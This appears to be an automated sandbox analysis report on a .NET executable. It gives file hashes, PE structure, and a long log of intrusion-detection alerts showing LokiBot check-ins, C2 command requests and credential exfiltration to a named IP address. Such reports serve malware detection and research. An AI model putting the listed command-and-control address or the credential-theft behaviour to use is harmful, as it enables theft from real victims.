                                                                          Size (bytes):46
                                                                          Entropy (8bit):1.0424600748477153
                                                                          Encrypted:false
                                                                          SSDEEP:3:/lbq:4
                                                                          MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                                                          SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                                                          SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                                                          SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                                                          Malicious:false
                                                                          Preview:........................................user.
                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.913749036393697
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          File name:file.exe
                                                                          File size:600'576 bytes
                                                                          MD5:66b03d1aff27d81e62b53fc108806211
                                                                          SHA1:2557ec8b32d0b42cac9cabde199d31c5d4e40041
                                                                          SHA256:59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
                                                                          SHA512:9f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d
                                                                          SSDEEP:12288:VrOj+Ri3AgFdZeDZskwkzA0+7xUNq4KC73vUECPnsSnR83PdB0:xQ3AgSskwZNeEqdCPssS3F
                                                                          TLSH:DFD423C93776E127D8BCD330A76250A287752D7BDB0CD65D09C9269ACFA6388C052F87
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:=g..............0...... .......&... ...@....@.. ....................................`................................
                                                                          Icon Hash:8bdb4b414d656d61
                                                                          Entrypoint:0x4926e6
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x673D3AED [Wed Nov 20 01:27:09 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x926940x4f.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x940000x1d7c.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x960000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x906ec0x90800d9d07ddc2146889bed0094cb505c9d7bFalse0.948473656466263data7.9227520273220895IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x940000x1d7c0x1e00189959de2daf17a1a19aa0679201b63fFalse0.80625data7.321945731144507IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x960000xc0x2006d98c7473e47d9fd8de69fea995f2518False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x941000x1733PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9151372284896447
                                                                          RT_GROUP_ICON0x958440x14data1.05
                                                                          RT_VERSION0x958680x314data0.43274111675126903
                                                                          RT_MANIFEST0x95b8c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-11-22T17:38:18.696905+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450000TCP
                                                                          2024-11-22T17:38:20.385794+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973394.156.177.4180TCP
                                                                          2024-11-22T17:38:20.385794+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973394.156.177.4180TCP
                                                                          2024-11-22T17:38:20.385794+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973394.156.177.4180TCP
                                                                          2024-11-22T17:38:21.673105+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973394.156.177.4180TCP
                                                                          2024-11-22T17:38:22.053197+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973594.156.177.4180TCP
                                                                          2024-11-22T17:38:22.053197+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973594.156.177.4180TCP
                                                                          2024-11-22T17:38:22.053197+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973594.156.177.4180TCP
                                                                          2024-11-22T17:38:23.332524+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973594.156.177.4180TCP
                                                                          2024-11-22T17:38:23.667763+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973694.156.177.4180TCP
                                                                          2024-11-22T17:38:23.667763+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973694.156.177.4180TCP
                                                                          2024-11-22T17:38:23.667763+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973694.156.177.4180TCP
                                                                          2024-11-22T17:38:24.937744+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973694.156.177.4180TCP
                                                                          2024-11-22T17:38:24.937744+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973694.156.177.4180TCP
                                                                          2024-11-22T17:38:25.060056+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449736TCP
                                                                          2024-11-22T17:38:25.419739+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973894.156.177.4180TCP
                                                                          2024-11-22T17:38:25.419739+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973894.156.177.4180TCP
                                                                          2024-11-22T17:38:25.419739+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973894.156.177.4180TCP
                                                                          2024-11-22T17:38:26.773102+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973894.156.177.4180TCP
                                                                          2024-11-22T17:38:26.773102+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973894.156.177.4180TCP
                                                                          2024-11-22T17:38:26.901213+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449738TCP
                                                                          2024-11-22T17:38:27.183872+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973994.156.177.4180TCP
                                                                          2024-11-22T17:38:27.183872+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973994.156.177.4180TCP
                                                                          2024-11-22T17:38:27.183872+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973994.156.177.4180TCP
                                                                          2024-11-22T17:38:28.639683+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973994.156.177.4180TCP
                                                                          2024-11-22T17:38:28.639683+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973994.156.177.4180TCP
                                                                          2024-11-22T17:38:28.759253+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449739TCP
                                                                          2024-11-22T17:38:29.035149+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974094.156.177.4180TCP
                                                                          2024-11-22T17:38:29.035149+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974094.156.177.4180TCP
                                                                          2024-11-22T17:38:29.035149+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974094.156.177.4180TCP
                                                                          2024-11-22T17:38:30.444496+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974094.156.177.4180TCP
                                                                          2024-11-22T17:38:30.444496+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974094.156.177.4180TCP
                                                                          2024-11-22T17:38:30.564948+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449740TCP
                                                                          2024-11-22T17:38:30.844447+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974194.156.177.4180TCP
                                                                          2024-11-22T17:38:30.844447+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974194.156.177.4180TCP
                                                                          2024-11-22T17:38:30.844447+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974194.156.177.4180TCP
                                                                          2024-11-22T17:38:32.251170+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974194.156.177.4180TCP
                                                                          2024-11-22T17:38:32.251170+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974194.156.177.4180TCP
                                                                          2024-11-22T17:38:32.375028+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449741TCP
                                                                          2024-11-22T17:38:32.663838+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974394.156.177.4180TCP
                                                                          2024-11-22T17:38:32.663838+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974394.156.177.4180TCP
                                                                          2024-11-22T17:38:32.663838+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974394.156.177.4180TCP
                                                                          2024-11-22T17:38:33.940877+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974394.156.177.4180TCP
                                                                          2024-11-22T17:38:33.940877+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974394.156.177.4180TCP
                                                                          2024-11-22T17:38:34.060918+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449743TCP
                                                                          2024-11-22T17:38:34.331046+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974594.156.177.4180TCP
                                                                          2024-11-22T17:38:34.331046+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974594.156.177.4180TCP
                                                                          2024-11-22T17:38:34.331046+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974594.156.177.4180TCP
                                                                          2024-11-22T17:38:35.739391+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974594.156.177.4180TCP
                                                                          2024-11-22T17:38:35.739391+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974594.156.177.4180TCP
                                                                          2024-11-22T17:38:35.862948+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449745TCP
                                                                          2024-11-22T17:38:36.401062+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974894.156.177.4180TCP
                                                                          2024-11-22T17:38:36.401062+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974894.156.177.4180TCP
                                                                          2024-11-22T17:38:36.401062+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974894.156.177.4180TCP
                                                                          2024-11-22T17:38:37.721603+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974894.156.177.4180TCP
                                                                          2024-11-22T17:38:37.721603+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974894.156.177.4180TCP
                                                                          2024-11-22T17:38:37.847124+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449748TCP
                                                                          2024-11-22T17:38:38.111286+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974994.156.177.4180TCP
                                                                          2024-11-22T17:38:38.111286+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974994.156.177.4180TCP
                                                                          2024-11-22T17:38:38.111286+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974994.156.177.4180TCP
                                                                          2024-11-22T17:38:39.565166+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974994.156.177.4180TCP
                                                                          2024-11-22T17:38:39.565166+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974994.156.177.4180TCP
                                                                          2024-11-22T17:38:39.689057+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449749TCP
                                                                          2024-11-22T17:38:39.948025+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975194.156.177.4180TCP
                                                                          2024-11-22T17:38:39.948025+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975194.156.177.4180TCP
                                                                          2024-11-22T17:38:39.948025+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975194.156.177.4180TCP
                                                                          2024-11-22T17:38:41.267831+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975194.156.177.4180TCP
                                                                          2024-11-22T17:38:41.267831+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975194.156.177.4180TCP
                                                                          2024-11-22T17:38:41.388207+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449751TCP
                                                                          2024-11-22T17:38:41.659082+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975394.156.177.4180TCP
                                                                          2024-11-22T17:38:41.659082+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975394.156.177.4180TCP
                                                                          2024-11-22T17:38:41.659082+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975394.156.177.4180TCP
                                                                          2024-11-22T17:38:43.017979+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975394.156.177.4180TCP
                                                                          2024-11-22T17:38:43.017979+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975394.156.177.4180TCP
                                                                          2024-11-22T17:38:43.138286+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449753TCP
                                                                          2024-11-22T17:38:43.413430+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975494.156.177.4180TCP
                                                                          2024-11-22T17:38:43.413430+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975494.156.177.4180TCP
                                                                          2024-11-22T17:38:43.413430+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975494.156.177.4180TCP
                                                                          2024-11-22T17:38:44.821525+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975494.156.177.4180TCP
                                                                          2024-11-22T17:38:44.821525+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975494.156.177.4180TCP
                                                                          2024-11-22T17:38:44.941143+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449754TCP
                                                                          2024-11-22T17:38:45.199702+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975594.156.177.4180TCP
                                                                          2024-11-22T17:38:45.199702+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975594.156.177.4180TCP
                                                                          2024-11-22T17:38:45.199702+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975594.156.177.4180TCP
                                                                          2024-11-22T17:38:46.587354+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975594.156.177.4180TCP
                                                                          2024-11-22T17:38:46.587354+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975594.156.177.4180TCP
                                                                          2024-11-22T17:38:46.707141+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449755TCP
                                                                          2024-11-22T17:38:46.970645+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975694.156.177.4180TCP
                                                                          2024-11-22T17:38:46.970645+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975694.156.177.4180TCP
                                                                          2024-11-22T17:38:46.970645+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975694.156.177.4180TCP
                                                                          2024-11-22T17:38:48.298382+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975694.156.177.4180TCP
                                                                          2024-11-22T17:38:48.298382+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975694.156.177.4180TCP
                                                                          2024-11-22T17:38:48.418123+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449756TCP
                                                                          2024-11-22T17:38:48.693877+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975794.156.177.4180TCP
                                                                          2024-11-22T17:38:48.693877+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975794.156.177.4180TCP
                                                                          2024-11-22T17:38:48.693877+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975794.156.177.4180TCP
                                                                          2024-11-22T17:38:50.103232+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975794.156.177.4180TCP
                                                                          2024-11-22T17:38:50.103232+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975794.156.177.4180TCP
                                                                          2024-11-22T17:38:50.222754+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449757TCP
                                                                          2024-11-22T17:38:50.493985+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975894.156.177.4180TCP
                                                                          2024-11-22T17:38:50.493985+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975894.156.177.4180TCP
                                                                          2024-11-22T17:38:50.493985+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975894.156.177.4180TCP
                                                                          2024-11-22T17:38:51.916181+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975894.156.177.4180TCP
                                                                          2024-11-22T17:38:51.916181+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975894.156.177.4180TCP
                                                                          2024-11-22T17:38:52.042226+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449758TCP
                                                                          2024-11-22T17:38:52.309427+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975994.156.177.4180TCP
                                                                          2024-11-22T17:38:52.309427+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975994.156.177.4180TCP
                                                                          2024-11-22T17:38:52.309427+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975994.156.177.4180TCP
                                                                          2024-11-22T17:38:53.761108+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975994.156.177.4180TCP
                                                                          2024-11-22T17:38:53.761108+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975994.156.177.4180TCP
                                                                          2024-11-22T17:38:53.883990+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449759TCP
                                                                          2024-11-22T17:38:54.159922+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976094.156.177.4180TCP
                                                                          2024-11-22T17:38:54.159922+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976094.156.177.4180TCP
                                                                          2024-11-22T17:38:54.159922+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976094.156.177.4180TCP
                                                                          2024-11-22T17:38:55.610382+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976094.156.177.4180TCP
                                                                          2024-11-22T17:38:55.610382+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976094.156.177.4180TCP
                                                                          2024-11-22T17:38:55.733469+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449760TCP
                                                                          2024-11-22T17:38:56.007119+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976294.156.177.4180TCP
                                                                          2024-11-22T17:38:56.007119+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976294.156.177.4180TCP
                                                                          2024-11-22T17:38:56.007119+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976294.156.177.4180TCP
                                                                          2024-11-22T17:38:57.457422+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976294.156.177.4180TCP
                                                                          2024-11-22T17:38:57.457422+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976294.156.177.4180TCP
                                                                          2024-11-22T17:38:57.577179+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449762TCP
                                                                          2024-11-22T17:38:57.847693+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976894.156.177.4180TCP
                                                                          2024-11-22T17:38:57.847693+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976894.156.177.4180TCP
                                                                          2024-11-22T17:38:57.847693+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976894.156.177.4180TCP
                                                                          2024-11-22T17:38:59.302710+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976894.156.177.4180TCP
                                                                          2024-11-22T17:38:59.302710+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976894.156.177.4180TCP
                                                                          2024-11-22T17:38:59.426546+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449768TCP
                                                                          2024-11-22T17:38:59.730255+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976994.156.177.4180TCP
                                                                          2024-11-22T17:38:59.730255+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976994.156.177.4180TCP
                                                                          2024-11-22T17:38:59.730255+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976994.156.177.4180TCP
                                                                          2024-11-22T17:39:01.010755+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976994.156.177.4180TCP
                                                                          2024-11-22T17:39:01.010755+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976994.156.177.4180TCP
                                                                          2024-11-22T17:39:01.131407+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449769TCP
                                                                          2024-11-22T17:39:01.391645+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977594.156.177.4180TCP
                                                                          2024-11-22T17:39:01.391645+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977594.156.177.4180TCP
                                                                          2024-11-22T17:39:01.391645+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977594.156.177.4180TCP
                                                                          2024-11-22T17:39:02.801173+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977594.156.177.4180TCP
                                                                          2024-11-22T17:39:02.801173+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977594.156.177.4180TCP
                                                                          2024-11-22T17:39:02.920927+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449775TCP
                                                                          2024-11-22T17:39:03.187495+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978194.156.177.4180TCP
                                                                          2024-11-22T17:39:03.187495+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978194.156.177.4180TCP
                                                                          2024-11-22T17:39:03.187495+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978194.156.177.4180TCP
                                                                          2024-11-22T17:39:04.480951+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978194.156.177.4180TCP
                                                                          2024-11-22T17:39:04.480951+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978194.156.177.4180TCP
                                                                          2024-11-22T17:39:04.600571+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449781TCP
                                                                          2024-11-22T17:39:04.874345+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978794.156.177.4180TCP
                                                                          2024-11-22T17:39:04.874345+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978794.156.177.4180TCP
                                                                          2024-11-22T17:39:04.874345+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978794.156.177.4180TCP
                                                                          2024-11-22T17:39:06.235877+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978794.156.177.4180TCP
                                                                          2024-11-22T17:39:06.235877+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978794.156.177.4180TCP
                                                                          2024-11-22T17:39:06.355478+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449787TCP
                                                                          2024-11-22T17:39:06.624697+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978894.156.177.4180TCP
